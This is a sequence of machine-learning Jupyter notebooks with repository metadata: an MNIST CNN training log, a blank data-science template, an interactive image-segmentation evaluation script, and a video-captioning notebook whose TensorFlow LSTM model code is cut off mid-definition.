912us/sample - loss: 0.0268 - accuracy: 0.9913\nEpoch 5/30\n37800/37800 [==============================] - 34s 909us/sample - loss: 0.0211 - accuracy: 0.9933\nEpoch 6/30\n37800/37800 [==============================] - 35s 914us/sample - loss: 0.0174 - accuracy: 0.9950\nEpoch 7/30\n37800/37800 [==============================] - 34s 908us/sample - loss: 0.0142 - accuracy: 0.9959\nEpoch 8/30\n37800/37800 [==============================] - 34s 909us/sample - loss: 0.0118 - accuracy: 0.9964\nEpoch 9/30\n37800/37800 [==============================] - 34s 911us/sample - loss: 0.0103 - accuracy: 0.9974\nEpoch 10/30\n37800/37800 [==============================] - 34s 909us/sample - loss: 0.0089 - accuracy: 0.9977\nEpoch 11/30\n37800/37800 [==============================] - 34s 911us/sample - loss: 0.0087 - accuracy: 0.9976\nEpoch 12/30\n37800/37800 [==============================] - 34s 910us/sample - loss: 0.0079 - accuracy: 0.9976\nEpoch 13/30\n37800/37800 [==============================] - 34s 901us/sample - loss: 0.0064 - accuracy: 0.9984\nEpoch 14/30\n37800/37800 [==============================] - 34s 906us/sample - loss: 0.0050 - accuracy: 0.9986\nEpoch 15/30\n37800/37800 [==============================] - 35s 913us/sample - loss: 0.0041 - accuracy: 0.9989\nEpoch 16/30\n37800/37800 [==============================] - 34s 902us/sample - loss: 0.0055 - accuracy: 0.9986\nEpoch 17/30\n37800/37800 [==============================] - 34s 911us/sample - loss: 0.0049 - accuracy: 0.9986\nEpoch 18/30\n37800/37800 [==============================] - 34s 903us/sample - loss: 0.0039 - accuracy: 0.9990\nEpoch 19/30\n37800/37800 [==============================] - 34s 907us/sample - loss: 0.0042 - accuracy: 0.9990\nEpoch 20/30\n37800/37800 [==============================] - 35s 925us/sample - loss: 0.0027 - accuracy: 0.9990\nEpoch 21/30\n37800/37800 [==============================] - 34s 908us/sample - loss: 0.0034 - accuracy: 0.9990\nEpoch 22/30\n37800/37800 [==============================] - 34s 902us/sample - loss: 0.0044 - accuracy: 0.9990\nEpoch 23/30\n37800/37800 [==============================] - 34s 899us/sample - loss: 0.0039 - accuracy: 0.9991\nEpoch 24/30\n37800/37800 [==============================] - 34s 909us/sample - loss: 0.0024 - accuracy: 0.9994\nEpoch 25/30\n37800/37800 [==============================] - 34s 897us/sample - loss: 0.0027 - accuracy: 0.9992\nEpoch 26/30\n37800/37800 [==============================] - 34s 902us/sample - loss: 0.0039 - accuracy: 0.9993\nEpoch 27/30\n37800/37800 [==============================] - 34s 896us/sample - loss: 0.0021 - accuracy: 0.9996\nEpoch 28/30\n37800/37800 [==============================] - 34s 902us/sample - loss: 0.0035 - accuracy: 0.9995\nEpoch 29/30\n37800/37800 [==============================] - 34s 894us/sample - loss: 0.0032 - accuracy: 0.9993\nEpoch 30/30\n37800/37800 [==============================] - 34s 897us/sample - loss: 0.0025 - accuracy: 0.9996\n" ] ], [ [ "Let’s evaluate the model on the test data.", "_____no_output_____" ] ], [ [ "test_loss, test_acc = model.evaluate(X_val, Y_val)\ntest_acc", "4200/4200 [==============================] - 2s 363us/sample - loss: 0.1192 - accuracy: 0.9902\n" ], [ "results = model.predict(test_data)\n\n# select the indix with the maximum probability\nresults = np.argmax(results,axis = 1)\n\nresults = pd.Series(results,name=\"Label\")", "_____no_output_____" ] ], [ [ "**submission file**", "_____no_output_____" ] ], [ [ "submission = pd.concat([pd.Series(range(1,28001),name = \"ImageId\"),results],axis = 1)\n\nsubmission.to_csv(\"cnn_mnist_submission5.csv\",index=False)", "_____no_output_____" ], [ "", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ] ]
e72e629f6859961076c6bba613bfd2058a1438ab
8,739
ipynb
Jupyter Notebook
ds/practice/frameworks/ds_ml_template.ipynb
tobias-fyi/vela
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
[ "MIT" ]
null
null
null
ds/practice/frameworks/ds_ml_template.ipynb
tobias-fyi/vela
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
[ "MIT" ]
8
2020-03-24T17:47:23.000Z
2022-03-12T00:33:21.000Z
ds/practice/frameworks/ds_ml_template.ipynb
tobias-fyi/vela
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
[ "MIT" ]
null
null
null
19.164474
91
0.507152
[ [ [ "# Data Science Template\n\nBy Tobias Reaper", "_____no_output_____" ], [ "---\n\n## Contents\n\n", "_____no_output_____" ], [ "---\n\n## Description\n", "_____no_output_____" ], [ "---\n\n## Introduction\n\n### Business Question\n\n#### How does this help the business?\n\n### Solution Overview\n\n- Assumptions:\n- Supervised model\n- Type of classification / regression / etc.\n\n#### Process\n\n- Data processing and exploration\n - Target engineering\n - Explore the data: types, ranges, distributions, outliers\n - Feature relationships\n- Evaluate models\n - Split data into train and test\n - Choose evaluation metric\n - Start with a baseline model\n - Tune hyperparameters and conduct feature engineering to increase predictive power", "_____no_output_____" ], [ "---\n\n## Data and Libraries Setup", "_____no_output_____" ], [ "### Imports and Configuration", "_____no_output_____" ] ], [ [ "# Basic imports\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# ML / sklearn imports\nfrom sklearn.model_selection import train_test_split, RandomizedSearchCV\nfrom sklearn.ensemble import RandomForestClassifier", "_____no_output_____" ], [ "# Configuration\npd.options.display.max_columns = None\n# Suppress scientific notation\npd.options.display.float_format = '{:.2f}'.format\nseed = 92 # Set a random seed", "_____no_output_____" ] ], [ [ "### Data import and overview\n\n- Preview of columns\n- Drop unneeded columns\n- Deal with null values\n- What are the data types and do any need to be fixed?", "_____no_output_____" ] ], [ [ "# Import ____\ndf = pd.read_csv()\ndf.head()", "_____no_output_____" ], [ "# Basic shape of data\ndf.shape", "_____no_output_____" ], [ "# Take a look at data types\ndf.dtypes", "_____no_output_____" ] ], [ [ "---\n\n## Data Exploration and Preprocessing", "_____no_output_____" ], [ "### Data types", "_____no_output_____" ] ], [ [ "# Convert dates to datetimes", "_____no_output_____" ] ], [ [ "### Target engineering", "_____no_output_____" ], [ "### Data exploration", "_____no_output_____" ], [ "---\n\n## Modeling\n\n- Split into train and test\n- Choose evaluation metric\n- Baseline model\n- Iterate\n - Feature engineering\n - Hyperparameter tuning\n- Validate", "_____no_output_____" ], [ "### Split data into train and test", "_____no_output_____" ], [ "### Baseline model pipeline", "_____no_output_____" ], [ "### Feature engineering", "_____no_output_____" ], [ "### Hyperparameter tuning", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
e72e6f332e864e60c13f63e474fe42d3e6594e29
5,366
ipynb
Jupyter Notebook
notebooks/test_any_model.ipynb
aagaard/ritm_interactive_segmentation
c68b45a54e99eb5401f50e62f7e43a11e34964ee
[ "MIT" ]
278
2021-02-13T11:23:35.000Z
2022-03-31T03:03:50.000Z
notebooks/test_any_model.ipynb
18724799167/ritm_interactive_segmentation
d54a43ff6d987e0ca369c47f9be296337ba530f8
[ "MIT" ]
17
2021-02-21T02:28:38.000Z
2022-03-15T12:19:45.000Z
notebooks/test_any_model.ipynb
18724799167/ritm_interactive_segmentation
d54a43ff6d987e0ca369c47f9be296337ba530f8
[ "MIT" ]
63
2021-02-18T06:08:46.000Z
2022-03-28T06:57:43.000Z
26.83
106
0.543422
[ [ [ "%matplotlib inline\nimport matplotlib.pyplot as plt\n\nimport sys\nimport numpy as np\nimport torch\n\nsys.path.insert(0, '..')\nfrom isegm.utils import vis, exp\n\nfrom isegm.inference import utils\nfrom isegm.inference.evaluation import evaluate_dataset, evaluate_sample\n\ndevice = torch.device('cuda:0')\ncfg = exp.load_config_file('../config.yml', return_edict=True)", "_____no_output_____" ] ], [ [ "### Init dataset", "_____no_output_____" ] ], [ [ "# Possible choices: 'GrabCut', 'Berkeley', 'DAVIS', 'COCO_MVal', 'SBD'\nDATASET = 'GrabCut'\ndataset = utils.get_dataset(DATASET, cfg)", "_____no_output_____" ] ], [ [ "### Init model", "_____no_output_____" ] ], [ [ "from isegm.inference.predictors import get_predictor\n\nEVAL_MAX_CLICKS = 20\nMODEL_THRESH = 0.49\n\ncheckpoint_path = utils.find_checkpoint(cfg.INTERACTIVE_MODELS_PATH, 'coco_lvis_h18s_itermask')\nmodel = utils.load_is_model(checkpoint_path, device)\n\n# Possible choices: 'NoBRS', 'f-BRS-A', 'f-BRS-B', 'f-BRS-C', 'RGB-BRS', 'DistMap-BRS'\nbrs_mode = 'f-BRS-B'\npredictor = get_predictor(model, brs_mode, device, prob_thresh=MODEL_THRESH)", "_____no_output_____" ] ], [ [ "### Dataset evaluation", "_____no_output_____" ] ], [ [ "TARGET_IOU = 0.9\n\nall_ious, elapsed_time = evaluate_dataset(dataset, predictor, pred_thr=MODEL_THRESH, \n max_iou_thr=TARGET_IOU, max_clicks=EVAL_MAX_CLICKS)\nmean_spc, mean_spi = utils.get_time_metrics(all_ious, elapsed_time)\nnoc_list, over_max_list = utils.compute_noc_metric(all_ious,\n iou_thrs=[0.8, 0.85, 0.9],\n max_clicks=EVAL_MAX_CLICKS)\n\nheader, table_row = utils.get_results_table(noc_list, over_max_list, brs_mode, DATASET,\n mean_spc, elapsed_time, EVAL_MAX_CLICKS)\nprint(header)\nprint(table_row)", "_____no_output_____" ] ], [ [ "### Single sample eval", "_____no_output_____" ] ], [ [ "sample_id = 12\nTARGET_IOU = 0.95\n\nsample = dataset.get_sample(sample_id)\ngt_mask = sample.gt_mask\n\nclicks_list, ious_arr, pred = evaluate_sample(sample.image, gt_mask, predictor, \n pred_thr=MODEL_THRESH, \n max_iou_thr=TARGET_IOU, max_clicks=EVAL_MAX_CLICKS)\n\npred_mask = pred > MODEL_THRESH\ndraw = vis.draw_with_blend_and_clicks(sample.image, mask=pred_mask, clicks_list=clicks_list)\ndraw = np.concatenate((draw,\n 255 * pred_mask[:, :, np.newaxis].repeat(3, axis=2),\n 255 * (gt_mask > 0)[:, :, np.newaxis].repeat(3, axis=2)\n), axis=1)\n\nprint(ious_arr)\n\nplt.figure(figsize=(20, 30))\nplt.imshow(draw)\nplt.show()", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
e72e79e4a8a6ef7b83e1384d3efc9c28c1342c97
5,618
ipynb
Jupyter Notebook
05_validate.ipynb
sso0090/garden2
4ecfe4b679cd17e3c9f9536cd48c8baebfb2cd5f
[ "Apache-2.0" ]
null
null
null
05_validate.ipynb
sso0090/garden2
4ecfe4b679cd17e3c9f9536cd48c8baebfb2cd5f
[ "Apache-2.0" ]
2
2021-09-28T01:20:50.000Z
2022-02-26T06:55:14.000Z
05_validate.ipynb
sso0090/garden2
4ecfe4b679cd17e3c9f9536cd48c8baebfb2cd5f
[ "Apache-2.0" ]
null
null
null
29.724868
1,054
0.579566
[ [ [ "## Exploring the data", "_____no_output_____" ], [ "So let's learn how we set up the data. ", "_____no_output_____" ] ], [ [ "#default_exp validate", "_____no_output_____" ], [ "#hide\nimport os, sys, warnings", "_____no_output_____" ], [ "#hide\nroot = \"D:/data_sets/24_garden\"\n#os.chdir(root)", "_____no_output_____" ], [ "#hide\nwarnings.filterwarnings(\"ignore\", category=RuntimeWarning) \nwarnings.filterwarnings(\"ignore\", category=UserWarning) ", "_____no_output_____" ], [ "#export\nfrom fastai2.vision.all import *\n#from garden2.utils import *\nfrom garden2.train import *", "_____no_output_____" ], [ "preds1, targs1 = learn1.get_preds()", "_____no_output_____" ], [ "from garden2._nbdev import index", "_____no_output_____" ], [ "index.values()", "_____no_output_____" ] ] ]
[ "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code" ] ]
e72e819187c1ba5916af5400cd470c8731775bf1
210,999
ipynb
Jupyter Notebook
StarGAN.ipynb
AZdet/summer_camp_GAN
45e7d3935e77bef24bb0c8ca90aee250a2a8950d
[ "MIT" ]
null
null
null
StarGAN.ipynb
AZdet/summer_camp_GAN
45e7d3935e77bef24bb0c8ca90aee250a2a8950d
[ "MIT" ]
null
null
null
StarGAN.ipynb
AZdet/summer_camp_GAN
45e7d3935e77bef24bb0c8ca90aee250a2a8950d
[ "MIT" ]
null
null
null
1,327.037736
111,294
0.951583
[ [ [ "# StarGAN\nGAN can not only generate fake realistic images, it can also generate fake images according to desired properties. StarGAN is able to ranslate an input image to any desired target domain. Given a source image and a few attributes we want(so called target domain) for the resulting image, StarGAN can generate desired realistic fake images.\n\n![title](images/intro.jpg)\n", "_____no_output_____" ] ], [ [ "%matplotlib inline\nimport os\nimport numpy as np\nfrom solver import Solver\nfrom data_loader import get_loader\nfrom torch.backends import cudnn\nimport torch\nimport matplotlib.pyplot as plt\nfrom torchvision import transforms as T\nfrom torchvision.utils import save_image\nfrom PIL import Image\nfrom default_config import config\nfrom detect_face import detect_face", "_____no_output_____" ], [ "def build_target():\n while True:\n try:\n print('')\n # 'Black_Hair', 'Blond_Hair', 'Brown_Hair', 'Male', 'Young'\n hair = input('Choose your desired hair color: 0 for Black_Hair, 1 for Blond_Hair, 2 for Brown_Hair ')\n hair = int(hair)\n assert hair in [0, 1, 2]\n male = input('Choose the gender you desired: 0 for Female, 1 for Male')\n male = int(male)\n assert male in [0, 1]\n age = input('Choose whether to generate aged, 0 for No, 1 for Yes: ')\n age = int(age)\n assert age in [0, 1]\n target = [0, 0, 0]\n target[hair] = 1\n target.append(male)\n target.append(1 - age)\n return target\n except Exception:\n pass\n \ndef showimage(img):\n npimg = img.numpy().squeeze()\n plt.imshow(np.transpose(npimg, (1,2,0)), interpolation='nearest')\n\ndef generate_face(face):\n if face is not None:\n new_face = Image.fromarray(face)\n new_face = transform(new_face)\n new_face = torch.unsqueeze(new_face, 0) #(1,3,256,256)\n\n # 'Black_Hair', 'Blond_Hair', 'Brown_Hair', 'Male', 'Young'\n new_face = new_face.to(solver.device)\n target_cls = torch.tensor(build_target()).float()\n target_cls = torch.unsqueeze(target_cls, 0)\n target_cls = target_cls.to(solver.device)\n gen_face = solver.G(new_face, target_cls)\n gen_face = solver.denorm(gen_face.detach().cpu())\n showimage(gen_face)\n\n else:\n print(\"No face detected!\")", "_____no_output_____" ] ], [ [ "### Load model", "_____no_output_____" ] ], [ [ "# set config\nconfig.mode = 'test'\nconfig.dataset = 'CelebA'\nconfig.image_size = 256\nconfig.c_dim = 5\nconfig.selected_attrs = ['Black_Hair', 'Blond_Hair', 'Brown_Hair', 'Male', 'Young']\nconfig.model_save_dir = 'stargan_celeba_256/models'\nconfig.result_dir = 'stargan_celeba_256/results'\n\n# solver\nsolver = Solver(None, None, config)\nsolver.restore_model(solver.test_iters)\ntransform = []\ntransform.append(T.Resize(config.image_size))\ntransform.append(T.ToTensor())\ntransform.append(T.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5)))\ntransform = T.Compose(transform)", "/home/nbuser/anaconda3_420/lib/python3.5/site-packages/tensorflow/python/framework/dtypes.py:455: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint8 = np.dtype([(\"qint8\", np.int8, 1)])\n/home/nbuser/anaconda3_420/lib/python3.5/site-packages/tensorflow/python/framework/dtypes.py:456: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_quint8 = np.dtype([(\"quint8\", np.uint8, 1)])\n/home/nbuser/anaconda3_420/lib/python3.5/site-packages/tensorflow/python/framework/dtypes.py:457: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint16 = np.dtype([(\"qint16\", np.int16, 1)])\n/home/nbuser/anaconda3_420/lib/python3.5/site-packages/tensorflow/python/framework/dtypes.py:458: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_quint16 = np.dtype([(\"quint16\", np.uint16, 1)])\n/home/nbuser/anaconda3_420/lib/python3.5/site-packages/tensorflow/python/framework/dtypes.py:459: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint32 = np.dtype([(\"qint32\", np.int32, 1)])\n/home/nbuser/anaconda3_420/lib/python3.5/site-packages/tensorflow/python/framework/dtypes.py:462: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n np_resource = np.dtype([(\"resource\", np.ubyte, 1)])\n" ] ], [ [ "### Load image and transfer", "_____no_output_____" ] ], [ [ "face = detect_face('./images/02.jpg')\nplt.imshow(face)\nplt.show()", "_____no_output_____" ], [ "generate_face(face)", "\nChoose your desired hair color: 0 for Black_Hair, 1 for Blond_Hair, 2 for Brown_Hair 1\nChoose the gender you desired: 0 for Female, 1 for Male1\nChoose whether to generate aged, 0 for No, 1 for Yes: 0\n" ] ], [ [ "# ", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ] ]
e72e836a99d2db0d3b045b20daa85603f273d1e3
114,157
ipynb
Jupyter Notebook
Model-Train-Test-2D-Attention.ipynb
Curious-Geek/Video-Captioning
93a1af5a28ea4e972398f5df63977270c5f52c43
[ "MIT" ]
9
2020-05-03T04:30:26.000Z
2022-03-08T02:09:52.000Z
Model-Train-Test-2D-Attention.ipynb
Chandra-S-Narain-Kappera/Video-Captioning
93a1af5a28ea4e972398f5df63977270c5f52c43
[ "MIT" ]
null
null
null
Model-Train-Test-2D-Attention.ipynb
Chandra-S-Narain-Kappera/Video-Captioning
93a1af5a28ea4e972398f5df63977270c5f52c43
[ "MIT" ]
3
2018-11-01T13:19:50.000Z
2019-07-31T16:37:26.000Z
49.828459
458
0.444248
[ [ [ "# Code to train and test", "_____no_output_____" ], [ "### Write the captions from json file:", "_____no_output_____" ] ], [ [ "import json\nimport os, os.path\nimport pickle\n\ntrain_val = json.load(open('videodatainfo_2017.json', 'r'))\n\n\n# combine all images and annotations together\nsentences = train_val['sentences']\n\n# for efficiency lets group annotations by video\nitoa = {}\nfor s in sentences:\n videoid_buf = s['video_id']\n videoid = int(videoid_buf[5:])\n if not videoid in itoa: itoa[videoid] = []\n itoa[videoid].append(s)\n \noutput = open('./DATA/word_features/captions.pkl', 'wb')\npickle.dump(itoa, output)\noutput.close()\n", "_____no_output_____" ] ], [ [ "### Auxilary functions to handle captions", "_____no_output_____" ] ], [ [ "import numpy as np\n\n\"\"\"Functions to do the following:\n * Create vocabulary\n * Create dictionary mapping from word to word_id\n * Map words in captions to word_ids\"\"\"\n\ndef build_vocab(word_count_thresh):\n \"\"\"Function to create vocabulary based on word count threshold.\n Input:\n word_count_thresh: Threshold to choose words to include to the vocabulary\n Output:\n vocabulary: Set of words in the vocabulary\"\"\"\n \n pkl_file = open('./DATA/word_features/captions.pkl', 'rb')\n sentences = pickle.load(pkl_file)\n pkl_file.close()\n\n unk_required = False\n all_captions = []\n word_counts = {}\n for vid in sentences.keys():\n for cid in range(0,20):\n caption = sentences[vid][cid]['caption']\n caption = '<BOS> ' + caption + ' <EOS>'\n all_captions.append(caption)\n for word in caption.split(' '):\n if word in word_counts.keys():\n word_counts[word] += 1\n else:\n word_counts[word] = 1\n for word in word_counts.keys():\n if word_counts[word] < word_count_thresh:\n word_counts.pop(word)\n unk_required = True\n return word_counts,unk_required\n\ndef word_to_word_ids(word_counts,unk_required, vocab_size):\n \"\"\"Function to map individual words to their id's.\n Input:\n word_counts: Dictionary with words mapped to their counts\n Output:\n word_to_id: Dictionary with words mapped to their id's. \n \"\"\"\n\n count = 0\n word_to_id = {}\n id_to_word = {}\n\n # Taking the most frequent vocab_size words\n words = [word for word in word_counts.keys()]\n values = [word_counts[word] for word in words]\n sorted_indices = np.argsort(values)\n words = np.array(words)\n most_freq_words = words[sorted_indices[::-1][0:vocab_size]]\n \n id_to_word = [most_freq_words[i] for i in range(most_freq_words.shape[0])] \n \n #word2idx\n word_to_id = {}\n for i in range(len(id_to_word)):\n word_to_id[id_to_word[i]] = i\n \n print(word_to_id['<EOS>'])\n index = word_to_id['<EOS>']\n word = id_to_word[0]\n print(index,word)\n \n word_to_id['<EOS>'] = 0\n id_to_word[0] = '<EOS>'\n word_to_id[word] = index\n id_to_word[index] = word\n \n return word_to_id,id_to_word\n\ndef convert_caption(caption,word_to_id,max_caption_length):\n \"\"\"Function to map each word in a caption to it's respective id and to retrieve caption masks\n Input:\n caption: Caption to convert to word_to_word_ids\n word_to_id: Dictionary mapping words to their respective id's\n max_caption_length: Maximum number of words allowed in a caption\n Output:\n caps: Captions with words mapped to word id's\n cap_masks: Caption masks with 1's at positions of words and 0's at pad locations\"\"\"\n caps,cap_masks = [],[]\n if type(caption) == 'str':\n caption = [caption] # if single caption, make it a list of captions of length one\n for cap in caption:\n cap = '<BOS> '+cap+' <EOS>'\n nWords = cap.count(' ') + 1\n if nWords >= max_caption_length:\n carr = cap.split(' ')\n carr = carr[0:(max_caption_length-2)]\n cap = ' '.join(carr)\n cap = cap + ' <EOS>'\n nWords = cap.count(' ')+1\n cap = cap + ' <EOS>'*(max_caption_length-nWords)\n cap_masks.append([1.0]*nWords + [0.0]*(max_caption_length-nWords))\n curr_cap = []\n for word in cap.split(' '):\n #print(word)\n if word in word_to_id.keys():\n curr_cap.append(word_to_id[word]) # word is present in chosen vocabulary\n else:\n curr_cap.append(word_to_id['<UNK>']) # word not present in chosen vocabulary\n caps.append(curr_cap)\n #print('Caption_Length:',len(caps[0]))\n return np.array(caps),np.array(cap_masks)", "_____no_output_____" ] ], [ [ "### Train Test Validation Split", "_____no_output_____" ] ], [ [ "## Get the list of the files we have extracted features\nimport os\nfrom sklearn.model_selection import train_test_split\n\nvideo_list = os.listdir('./DATA/features')\nvideos = []\nfor item in video_list:\n videos.append(item.split('-')[0])\n\nvideo_train, video_test = train_test_split(videos, test_size=0.1, random_state=42)\nvideo_train, video_val = train_test_split(video_train, test_size=0.1, random_state=42)", "_____no_output_____" ], [ "print('Training Videos -', len(video_train))\nprint('Testing Videos -', len(video_test))\nprint('Validation Videos -', len(video_val))", "Training Videos - 5890\nTesting Videos - 728\nValidation Videos - 655\n" ] ], [ [ "### Auxillary functions to handle model build", "_____no_output_____" ] ], [ [ "import numpy as np\nimport tensorflow as tf\nimport glob\nimport cv2\nimport imageio\nimport pickle\nnp.random.seed(0)\n#Global initializations\nn_lstm_steps = 30\nDATA_DIR = './DATA/'\nVIDEO_DIR = DATA_DIR + 'features/'\nYOUTUBE_CLIPS_DIR = DATA_DIR + 'videos/'\nTEXT_DIR = DATA_DIR+'word_features/'\npkl_file = open('./DATA/word_features/captions.pkl', 'rb')\nsentences = pickle.load(pkl_file)\npkl_file.close()\nword_counts,unk_required = build_vocab(0)\nword2id,id2word = word_to_word_ids(word_counts,unk_required, len(word_counts.keys()))\nvideo_files = video_train\nval_files = video_val\n\nprint (\"{0} files processed\".format(len(video_files)))\n\ndef get_bias_vector():\n \"\"\"Function to return the initialization for the bias vector\n for mapping from hidden_dim to vocab_size.\n Borrowed from neuraltalk by Andrej Karpathy\"\"\"\n bias_init_vector = np.array([1.0*word_counts[id2word[i]] for i in range(len(id2word))])\n bias_init_vector /= np.sum(bias_init_vector) # normalize to frequencies\n bias_init_vector = np.log(bias_init_vector)\n bias_init_vector -= np.max(bias_init_vector)\n return bias_init_vector\n\ndef fetch_data_batch(batch_size):\n \"\"\"Function to fetch a batch of video features, captions and caption masks\n Input:\n batch_size: Size of batch to load\n Output:\n curr_vids: Features of the randomly selected batch of video_files\n curr_caps: Ground truth (padded) captions for the selected videos\n curr_masks: Mask for the pad locations in curr_caps\"\"\"\n curr_batch_vids = np.random.choice(video_files,batch_size)\n curr_vids = np.array([np.load(VIDEO_DIR + vid+'-30-features' + '.npy') for vid in curr_batch_vids])\n captions = [np.random.choice(sentences[int(vid[5:])],1)[0]['caption'] for vid in curr_batch_vids]\n curr_caps,curr_masks = convert_caption(captions,word2id,n_lstm_steps)\n return curr_vids,curr_caps,curr_masks\n\ndef fetch_data_batch_val(batch_size):\n \"\"\"Function to fetch a batch of video features from the validation set and its captions.\n Input:\n batch_size: Size of batch to load\n Output:\n curr_vids: Features of the randomly selected batch of video_files\n curr_caps: Ground truth (padded) captions for the selected videos\"\"\"\n\n curr_batch_vids = np.random.choice(val_files,batch_size)\n curr_vids = np.array([np.load(VIDEO_DIR +vid+'-30-features' + '.npy') for vid in curr_batch_vids])\n captions = [np.random.choice(sentences[int(vid[5:])],1)[0]['caption'] for vid in curr_batch_vids]\n curr_caps,curr_masks = convert_caption(captions,word2id,n_lstm_steps)\n return curr_vids,curr_caps,curr_masks, curr_batch_vids\n\n\ndef print_in_english(caption_idx):\n \"\"\"Function to take a list of captions with words mapped to ids and\n print the captions after mapping word indices back to words.\"\"\"\n captions_english = [[id2word[word] for word in caption] for caption in caption_idx]\n for i,caption in enumerate(captions_english):\n if '<EOS>' in caption:\n caption = caption[0:caption.index('<EOS>')]\n print (str(i+1) + ' ' + ' '.join(caption))\n print ('..................................................')\n\ndef playVideo(video_urls):\n video = imageio.get_reader(YOUTUBE_CLIPS_DIR + video_urls[0] + '.mp4','ffmpeg')\n for frame in video:\n fr = cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)\n cv2.imshow('frame',fr)\n if cv2.waitKey(40) & 0xFF == ord('q'):\n break\n cv2.destroyAllWindows()", "2\n2 a\n5890 files processed\n" ], [ "print(len(word2id))", "20001\n" ], [ "tmp_val = 'video3707'\nnp.random.choice(sentences[int(tmp_val[5:])],1)[0]['caption']", "_____no_output_____" ], [ "tdata = np.load(VIDEO_DIR+'video0-30-features.npy')\ntdata.shape", "_____no_output_____" ], [ "len(word_counts.keys())", "_____no_output_____" ], [ "print(id2word[0], word2id['a'])", "<EOS> 1\n" ] ], [ [ "### Build the model to train", "_____no_output_____" ] ], [ [ "import numpy as np\nimport tensorflow as tf\nimport sys\n#GLOBAL VARIABLE INITIALIZATIONS TO BUILD MODEL\nn_steps = 30\nhidden_dim = 500\nframe_dim = 2048\nbatch_size = 1\nvocab_size = len(word2id)\nbias_init_vector = get_bias_vector()\nn_steps_vocab = 30\n\ndef build_model():\n \"\"\"This function creates weight matrices that transform:\n * frames to caption dimension\n * hidden state to vocabulary dimension\n * creates word embedding matrix \"\"\"\n\n print (\"Network config: \\nN_Steps: {}\\nHidden_dim:{}\\nFrame_dim:{}\\nBatch_size:{}\\nVocab_size:{}\\n\".format(n_steps,\n hidden_dim,\n frame_dim,\n batch_size,\n vocab_size))\n\n #Create placeholders for holding a batch of videos, captions and caption masks\n video = tf.placeholder(tf.float32,shape=[batch_size,n_steps,frame_dim],name='Input_Video')\n caption = tf.placeholder(tf.int32,shape=[batch_size,n_steps_vocab],name='GT_Caption')\n caption_mask = tf.placeholder(tf.float32,shape=[batch_size,n_steps_vocab],name='Caption_Mask')\n dropout_prob = tf.placeholder(tf.float32,name='Dropout_Keep_Probability')\n\n with tf.variable_scope('Im2Cap') as scope:\n W_im2cap = tf.get_variable(name='W_im2cap',shape=[frame_dim,\n hidden_dim],\n initializer=tf.random_uniform_initializer(minval=-0.08,maxval=0.08))\n b_im2cap = tf.get_variable(name='b_im2cap',shape=[hidden_dim],\n initializer=tf.constant_initializer(0.0))\n with tf.variable_scope('Hid2Vocab') as scope:\n W_H2vocab = tf.get_variable(name='W_H2vocab',shape=[hidden_dim,vocab_size],\n initializer=tf.random_uniform_initializer(minval=-0.08,maxval=0.08))\n b_H2vocab = tf.Variable(name='b_H2vocab',initial_value=bias_init_vector.astype(np.float32))\n\n with tf.variable_scope('Word_Vectors') as scope:\n word_emb = tf.get_variable(name='Word_embedding',shape=[vocab_size,hidden_dim],\n initializer=tf.random_uniform_initializer(minval=-0.08,maxval=0.08))\n print (\"Created weights\")\n\n #Build two LSTMs, one for processing the video and another for generating the caption\n with tf.variable_scope('LSTM_Video',reuse=None) as scope:\n lstm_vid = tf.nn.rnn_cell.BasicLSTMCell(hidden_dim)\n lstm_vid = tf.nn.rnn_cell.DropoutWrapper(lstm_vid,output_keep_prob=dropout_prob)\n with tf.variable_scope('LSTM_Caption',reuse=None) as scope:\n lstm_cap = tf.nn.rnn_cell.BasicLSTMCell(hidden_dim)\n lstm_cap = 